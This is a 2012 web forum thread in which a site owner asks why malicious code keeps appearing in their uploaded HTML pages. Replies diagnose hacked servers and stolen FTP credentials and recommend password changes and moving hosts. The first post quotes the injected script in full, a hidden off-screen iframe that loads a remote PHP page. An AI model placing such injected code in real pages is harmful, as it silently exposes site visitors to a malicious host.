Nasty virus code unexplainably in my html - HTML forum at WebmasterWorld - WebmasterWorld

Forum Moderators: open

Message Too Old, No Replies

Nasty virus code unexplainably in my html

Uploaded page turns adwarey

JustAnother

3:24 pm on Jul 5, 2012 (gmt 0)

10+ Year Member

Hi there! Please help me! It's driving me crazy:

Whenever I upload a simple html website, within a day or so something somehow adds some kind of virus code to it. The latest code looks like this, with the details of it sometimes changing:

<script>
var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'http://www.localwebgeek.com/wp-feeds.php');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('alphanumeric sequence) + 1);
_q.style.left = '-5597px';
document.write('<div id=\'__dradv\'></div>');
document.getElementById('__dradv').appendChild(_q);
</script>

What is this and where does it come from? Something automatically adds it to my webpages after they have been uploaded for a day or so.

Most importantly, how do I stop this dead in its tracks? Any help would be severely appreciated.

[edited by: tedster at 6:08 pm (utc) on Jul 5, 2012]
[edit reason] Remove chance of infection from the post [/edit]

rainborick

3:28 pm on Jul 5, 2012 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

Your site has almost certainly been hacked. Search on "remove malware from website" and you should find some good advice.

tedster

6:28 pm on Jul 5, 2012 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

No doubt your server has been hacked - and they installed a hidden file on the server that keeps overwriting the files when you try to fix them. This kind of hack has now been around for several years and the coders (criminals) have become way too sophisticated.

I just recently struggled with a similar "parasite content" hack and because the client had sub-standard hosting support, IMO - the only practical fix we could put together was to migrate their site to another web host.

incrediBILL

7:23 pm on Jul 5, 2012 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

This is also a reason I tell people don't use shared hosting if you can avoid it. No matter how good the hosting is, any customer that doesn't know what they're doing, which is the majority, can allow the server to be compromised by running outdated software that has known vulnerabilities.

I found a host a couple of years ago that had 50% of their shared hosting clients index pages infected on at least 20 servers that I tested. It was nearly a thousand domains involved, maybe more.

Bottom line, even if you clean up your account it can get infected over and over if you remain on that server so I agree with Tedster that moving to a new host is probably the best strategy.

jimbeetle

9:23 pm on Jul 5, 2012 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

The other possibility is your local machine, that's what happened to me a couple of years ago when somehow mine got infected with a keylogger script. So, besides getting in touch with your host be sure to scrub your local machine with AV and anti-malware programs.

MxAngel

4:06 am on Jul 11, 2012 (gmt 0)

10+ Year Member

Most importantly, how do I stop this dead in its tracks? Any help would be severely appreciated.

Any chance you're using Plesk? If yes you need to change ALL passwords. More info: [kb.parallels.com...]

You need to go through your logs, see which files they did modify, either htaccess, php and html files.

It looks like you're using AJAX to generate the content, look in php & js files for code surrounded by c3284d.

More info here too: [stopmalvertising.com...]

JustAnother

5:23 am on Jul 14, 2012 (gmt 0)

10+ Year Member

Thank you for your thinking on the matter. This was indeed something that drove me insane; however for now I have changed all possible passwords and so far it seems to be working, which makes me think that somehow somebody's rubbish stole my passwords and automatically re-uploaded versions of my website with the code in it. Now they don't have the passwords anymore they can't quite do it.

Please write your senate that we, the people, would like to have the death penalty instated for creators of malware.

MxAngel

11:59 am on Jul 14, 2012 (gmt 0)

10+ Year Member

You're welcome. :) It is a password issue indeed.

Just a quick question if you don't mind. Any chance that you're using Filezilla? And if yes, did you have malware on the PC recently?

Thanks for your time.

JustAnother

6:57 pm on Jul 16, 2012 (gmt 0)

10+ Year Member

I did use Filezilla up until a few weeks ago, but just took a wild guess at some point that if the file uploaded is different than the original on my computer, it could be the FTP software that is rewriting it right before uploading it, so I uninstalled Filezilla and now use Coffee cup.

Coffee cup doens't seem to upload all the pictures correctly unfortunately, but the text files are uploaded right. Haven't had problems of files uploaded being different than the originals as far as I can make out. Hopefully it won't start later.

oliondor

11:03 pm on Jul 16, 2012 (gmt 0)

10+ Year Member

I don't believe that Filezilla can be bad !

The server has just been hacked, nothing else to look at.

Leosghost

11:39 pm on Jul 16, 2012 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

Some hacks may take a while to be implemented..no rush ..

re ..filezilla "vanilla" problems..
[webmasterworld.com...]

( there are many more threads and posts here and elsewhere on the net about filezilla vulnerabilities )

Perfectly possible that the hacker knew how to get in for quite some time..and merely waited until they felt the moment was propitious..

MxAngel

4:11 am on Jul 17, 2012 (gmt 0)

10+ Year Member

When I did mention FileZilla I was refereing to the fact that passwords are stored in plain text and Filezilla among others is a target by malware. The malware steals the creditials and uploads them to a remote C&C server. That's one of the reasons why websites get hacked.

MxAngel

6:15 am on Jul 17, 2012 (gmt 0)

10+ Year Member

The latest version of ProFTPD still is vulnerable to the "Roaring Beast" root exploit, meaning this is a possible vector too for the infections. Note that Plesk Panels contains a copy of ProFTPD.

Source: [auscert.org.au...]